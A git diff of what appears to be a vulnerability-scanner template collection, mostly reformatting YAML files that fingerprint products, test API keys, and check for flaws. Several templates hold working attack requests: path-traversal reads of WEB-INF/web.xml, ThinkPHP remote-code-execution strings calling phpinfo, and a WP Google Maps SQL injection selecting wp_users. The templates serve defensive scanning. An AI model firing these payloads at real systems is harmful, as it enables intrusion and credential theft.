-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<TITLE>Olivetti CRF</TITLE>"
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<TITLE>Olivetti CRF</TITLE>"
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/oracle/oracle-dbass-detect.yaml b/technologies/oracle/oracle-dbass-detect.yaml
index e44478e162..2b9e8dc8c8 100644
--- a/technologies/oracle/oracle-dbass-detect.yaml
+++ b/technologies/oracle/oracle-dbass-detect.yaml
@@ -1,22 +1,22 @@
-id: oracle-dbass-detect
+id: oracle-dbass-detect
 
-info:
-  name: Oracle DBaaS Monitor Detect
-  author: pussycat0x
-  severity: info
-  tags: oracle,tech
+info:
+  name: Oracle DBaaS Monitor Detect
+  author: pussycat0x
+  severity: info
+  tags: oracle,tech
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/dbaas_monitor/login'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>DBaaS Monitor</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dbaas_monitor/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>DBaaS Monitor</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/oracle/oracle-dbcs.yaml b/technologies/oracle/oracle-dbcs.yaml
index cbd36a41da..237dcda967 100644
--- a/technologies/oracle/oracle-dbcs.yaml
+++ b/technologies/oracle/oracle-dbcs.yaml
@@ -1,25 +1,25 @@
-id: oracle-dbcs
-
-info:
-  name: Oracle Database as a Service
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-query: http.title:"Oracle Database as a Service"
-  tags: oracle,tech
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Oracle Database as a Service</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+id: oracle-dbcs
+
+info:
+  name: Oracle Database as a Service
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"Oracle Database as a Service"
+  tags: oracle,tech
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Oracle Database as a Service</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/puppet-node-manager-detect.yaml b/technologies/puppet-node-manager-detect.yaml
index be81e5ce0c..ed32a8c60c 100644
--- a/technologies/puppet-node-manager-detect.yaml
+++ b/technologies/puppet-node-manager-detect.yaml
@@ -1,24 +1,24 @@
-id: puppet-node-manager-detect
+id: puppet-node-manager-detect
 
-info:
-  name: Puppet Node Manager
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="puppet-Node-Manager"'
-  tags: node,tech
+info:
+  name: Puppet Node Manager
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="puppet-Node-Manager"'
+  tags: node,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Puppet Node Manager</title>'
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Puppet Node Manager</title>'
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/samsung-smarttv-debug.yaml b/technologies/samsung-smarttv-debug.yaml
index 8e24cfd4a7..8d7e496170 100644
--- a/technologies/samsung-smarttv-debug.yaml
+++ b/technologies/samsung-smarttv-debug.yaml
@@ -1,27 +1,27 @@
-id: samsung-smarttv-debug
-
-info:
-  name: Samsung SmartTV Debug Config
-  author: pussycat0x
-  severity: info
-  metadata:
-    verified: true
-    shodan-query: title:"Debug Config"
-  tags: samsung,tech,iot
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Debug Config</title>'
-          - 'MultiScreen Service'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+id: samsung-smarttv-debug
+
+info:
+  name: Samsung SmartTV Debug Config
+  author: pussycat0x
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Debug Config"
+  tags: samsung,tech,iot
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Debug Config</title>'
+          - 'MultiScreen Service'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/sucuri-firewall.yaml b/technologies/sucuri-firewall.yaml
index 2e980f7dc4..5dffe6b8ac 100644
--- a/technologies/sucuri-firewall.yaml
+++ b/technologies/sucuri-firewall.yaml
@@ -1,25 +1,25 @@
-id: sucuri-firewall
-
-info:
-  name: Sucuri Website Firewall - Not Configured
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: "sucuri firewall"
-    shodan-query: http.html:"sucuri firewall"
-  tags: tech,sucuri,firewall
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Sucuri WebSite Firewall - Not Configured</title>'
-
-      - type: status
-        status:
-          - 404
+id: sucuri-firewall
+
+info:
+  name: Sucuri Website Firewall - Not Configured
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: "sucuri firewall"
+    shodan-query: http.html:"sucuri firewall"
+  tags: tech,sucuri,firewall
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Sucuri WebSite Firewall - Not Configured</title>'
+
+      - type: status
+        status:
+          - 404
diff --git a/technologies/web-ftp-detect.yaml b/technologies/web-ftp-detect.yaml
index 571cd16c99..7520867056 100644
--- a/technologies/web-ftp-detect.yaml
+++ b/technologies/web-ftp-detect.yaml
@@ -1,23 +1,23 @@
-id: web-ftp-detect
+id: web-ftp-detect
 
-info:
-  name: Web FTP Detection
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7013
-  tags: webftp,tech,ftp
+info:
+  name: Web FTP Detection
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7013
+  tags: webftp,tech,ftp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Web-FTP"
-          - "square login"
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Web-FTP"
+          - "square login"
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/token-spray/api-securitytrails.yaml b/token-spray/api-securitytrails.yaml
index e09e9662f3..a378b4a3bb 100644
--- a/token-spray/api-securitytrails.yaml
+++ b/token-spray/api-securitytrails.yaml
@@ -1,25 +1,25 @@
-id: api-securitytrails
-
-info:
-  name: SecurityTrails API Test
-  author: 0ri2N
-  severity: info
-  reference:
-    - https://securitytrails.com
-    - https://docs.securitytrails.com
-    - https://securitytrails.com/corp/api
-  tags: dns,ssl,recon,securitytrails,token-spray
-
-self-contained: true
-requests:
-  - method: GET
-    path:
-      - https://api.securitytrails.com/v1/ping
-    headers:
-      APIKey: "{{token}}"
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - success
+id: api-securitytrails
+
+info:
+  name: SecurityTrails API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://securitytrails.com
+    - https://docs.securitytrails.com
+    - https://securitytrails.com/corp/api
+  tags: dns,ssl,recon,securitytrails,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.securitytrails.com/v1/ping
+    headers:
+      APIKey: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - success
diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml
index 3002593a8b..b7978cf03c 100644
--- a/token-spray/api-virustotal.yaml
+++ b/token-spray/api-virustotal.yaml
@@ -1,30 +1,30 @@
-id: api-virustotal
-
-info:
-  name: VirusTotal API Test
-  author: daffainfo
-  severity: info
-  reference:
-    - https://developers.virustotal.com/reference
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md
-  tags: token-spray,virustotal
-
-self-contained: true
-requests:
-  - raw:
-      - |
-        POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1
-        Host: www.virustotal.com
-        Content-Type: application/x-www-form-urlencoded
-        Content-Length: 86
-
-        apikey={{token}}&url=google.com
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"verbose_msg":'
-          - '"scan_date":'
-          - '"permalink":'
-        condition: and
+id: api-virustotal
+
+info:
+  name: VirusTotal API Test
+  author: daffainfo
+  severity: info
+  reference:
+    - https://developers.virustotal.com/reference
+    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md
+  tags: token-spray,virustotal
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1
+        Host: www.virustotal.com
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 86
+
+        apikey={{token}}&url=google.com
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"verbose_msg":'
+          - '"scan_date":'
+          - '"permalink":'
+        condition: and
diff --git a/vulnerabilities/generic/generic-j2ee-lfi.yaml b/vulnerabilities/generic/generic-j2ee-lfi.yaml
index 412befa269..5c9923e65e 100644
--- a/vulnerabilities/generic/generic-j2ee-lfi.yaml
+++ b/vulnerabilities/generic/generic-j2ee-lfi.yaml
@@ -1,44 +1,44 @@
-id: generic-j2ee-lfi
-
-info:
-  name: Generic J2EE LFI scan
-  author: davidfegyver
-  severity: high
-  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
-  reference:
-    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
-  metadata:
-    verified: true
-    shodan-query: http.title:"J2EE"
-  tags: lfi,generic,j2ee
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/WEB-INF/web.xml"
-      - "{{BaseURL}}/.//WEB-INF/web.xml"
-      - "{{BaseURL}}/../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<servlet-name>"
-          - "</web-app>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+id: generic-j2ee-lfi
+
+info:
+  name: Generic J2EE LFI scan
+  author: davidfegyver
+  severity: high
+  description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file.
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
+  metadata:
+    verified: true
+    shodan-query: http.title:"J2EE"
+  tags: lfi,generic,j2ee
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml"
+      - "{{BaseURL}}/../../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/../WEB-INF/web.xml;x="
+      - "{{BaseURL}}/WEB-INF/web.xml"
+      - "{{BaseURL}}/.//WEB-INF/web.xml"
+      - "{{BaseURL}}/../WEB-INF/web.xml"
+      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<servlet-name>"
+          - "</web-app>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
index daac2251b9..d437ac655a 100644
--- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
@@ -1,27 +1,27 @@
-id: thinkphp-2-rce
+id: thinkphp-2-rce
 
-info:
-  name: ThinkPHP 2 / 3 's' Parameter RCE
-  author: dr_set
-  severity: critical
-  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 2 / 3 's' Parameter RCE
+  author: dr_set
+  severity: critical
+  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
index 5d6b6a2362..6efefcf299 100644
--- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
@@ -1,27 +1,27 @@
-id: thinkphp-5022-rce
+id: thinkphp-5022-rce
 
-info:
-  name: ThinkPHP 5.0.22 RCE
-  author: dr_set
-  severity: critical
-  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
index 1cda70e12f..7f9bd46a05 100644
--- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
@@ -1,32 +1,32 @@
-id: thinkphp-5023-rce
+id: thinkphp-5023-rce
 
-info:
-  name: ThinkPHP 5.0.23 RCE
-  author: dr_set
-  severity: critical
-  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 5.0.23 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/index.php?s=captcha"
-
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?s=captcha"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/404-to-301-xss.yaml b/vulnerabilities/wordpress/404-to-301-xss.yaml
index ac8bf48c5e..8b83ef8a27 100644
--- a/vulnerabilities/wordpress/404-to-301-xss.yaml
+++ b/vulnerabilities/wordpress/404-to-301-xss.yaml
@@ -1,13 +1,17 @@
 id: 404-to-301-xss
 
 info:
-  name: 404 to 301 < 3.1.2 - Reflected Cross-Site Scripting
+  name: WordPress 404 to 301 Log Manager <3.1.2 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress 404 to 301 Log Manager 3.1.2 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1
     - https://wordpress.org/plugins/404-to-301
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/CVE-2019-10692.yaml b/vulnerabilities/wordpress/CVE-2019-10692.yaml
index bf7ac7dbd9..0b53ec3b6d 100644
--- a/vulnerabilities/wordpress/CVE-2019-10692.yaml
+++ b/vulnerabilities/wordpress/CVE-2019-10692.yaml
@@ -1,5 +1,5 @@
-id: CVE-2019-10692
-
+id: CVE-2019-10692
+
 info:
   name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection
   author: pussycat0x
@@ -21,26 +21,26 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"user_login"'
-          - '"user_pass"'
-          - '"user_nicename"'
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - application/json
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"user_login"'
+          - '"user_pass"'
+          - '"user_nicename"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
index 27d4456e69..271a1c4865 100644
--- a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
+++ b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml
@@ -1,32 +1,32 @@
-id: alfacgiapi-wordpress
+id: alfacgiapi-wordpress
 
-info:
-  name: alfacgiapi
-  author: pussycat0x
-  severity: low
-  description: Searches for sensitive directories present in the ALFA_DATA.
-  reference: https://www.exploit-db.com/ghdb/6999
-  tags: wordpress,listing
+info:
+  name: alfacgiapi
+  author: pussycat0x
+  severity: low
+  description: Searches for sensitive directories present in the ALFA_DATA.
+  reference: https://www.exploit-db.com/ghdb/6999
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-includes/ALFA_DATA/"
-      - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
-      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
-      - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-      - type: word
-        words:
-          - "/wp-content/plugins/"
-          - "/wp-includes/ALFA_DATA/"
-          - "/ALFA_DATA/alfacgiapi/"
-          - "/cgi-bin/ALFA_DATA/alfacgiapi/"
-        condition: or
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-includes/ALFA_DATA/"
+      - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
+      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
+      - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+      - type: word
+        words:
+          - "/wp-content/plugins/"
+          - "/wp-includes/ALFA_DATA/"
+          - "/ALFA_DATA/alfacgiapi/"
+          - "/cgi-bin/ALFA_DATA/alfacgiapi/"
+        condition: or
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/vulnerabilities/wordpress/analytify-plugin-xss.yaml
index f7b32e963e..a67b47ab90 100644
--- a/vulnerabilities/wordpress/analytify-plugin-xss.yaml
+++ b/vulnerabilities/wordpress/analytify-plugin-xss.yaml
@@ -1,16 +1,20 @@
 id: analytify-plugin-xss
 
 info:
-  name: Analytify < 4.2.1 - Cross-Site Scripting
+  name: Analytify <4.2.1 - Cross-Site Scripting
   author: Akincibor
   severity: medium
   description: |
-    The plugin does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to Reflected Cross-Site Scripting.
+    WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
   metadata:
     verified: true
     google-dork: inurl:/wp-content/plugins/wp-analytify
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wp,wordpress,analytify,wpscan,wp-plugin,xss
 
 requests:
@@ -35,3 +39,5 @@ requests:
       - type: status
         status:
           - 404
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
index 1b7c168aa4..0feaccd61a 100644
--- a/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
+++ b/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
@@ -1,16 +1,20 @@
 id: avchat-video-chat-xss
 
 info:
-  name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS
+  name: WordPress AVChat Video Chat 1.4.1 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
-    The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability.
+    WordPress AVChat Video Chat 1.4.1 is vulnerable to reflected cross-site scripting via index_popup.php and multiple parameters.
   reference:
     - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
     - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,,wp,wpscan,wordpress,wp-plugin
 
 
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/calameo-publications-xss.yaml b/vulnerabilities/wordpress/calameo-publications-xss.yaml
index 8b7e414d14..cd0c040307 100644
--- a/vulnerabilities/wordpress/calameo-publications-xss.yaml
+++ b/vulnerabilities/wordpress/calameo-publications-xss.yaml
@@ -1,17 +1,21 @@
 id: calameo-publications-xss
 
 info:
-  name: Manage Calameo Publications 1.1.0 - thickbox_content.php attachment_id Parameter Reflected XSS
+  name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
-    The Manage Calameo Publications by Athlon WordPress plugin was affected by a thickbox_content.php attachment_id Parameter Reflected XSS security vulnerability.
+    WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via  thickbox_content.php and the attachment_id parameter.
   reference:
     - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
     - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
     - https://wordpress.org/plugins/athlon-manage-calameo-publications/
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wp-plugin,xss,wp,wpscan
 
 requests:
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
index ee85ae4351..c432420d9e 100644
--- a/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
+++ b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
@@ -1,15 +1,19 @@
 id: checkout-fields-manager-xss
 
 info:
-  name: Checkout Fields Manager for WooCommerce < 5.5.7 - Reflected Cross-Site Scripting
+  name: WordPress Checkout Fields Manager for WooCommerce <5.5.7 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Checkout Fields Manager for WooCommerce 5.5.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
     - https://wordpress.org/plugins/woocommerce-checkout-manager
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/vulnerabilities/wordpress/clearfy-cache-xss.yaml
index 35ea283d0d..2ec2d9d0af 100644
--- a/vulnerabilities/wordpress/clearfy-cache-xss.yaml
+++ b/vulnerabilities/wordpress/clearfy-cache-xss.yaml
@@ -1,13 +1,17 @@
 id: clearfy-cache-xss
 
 info:
-  name: Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting
+  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
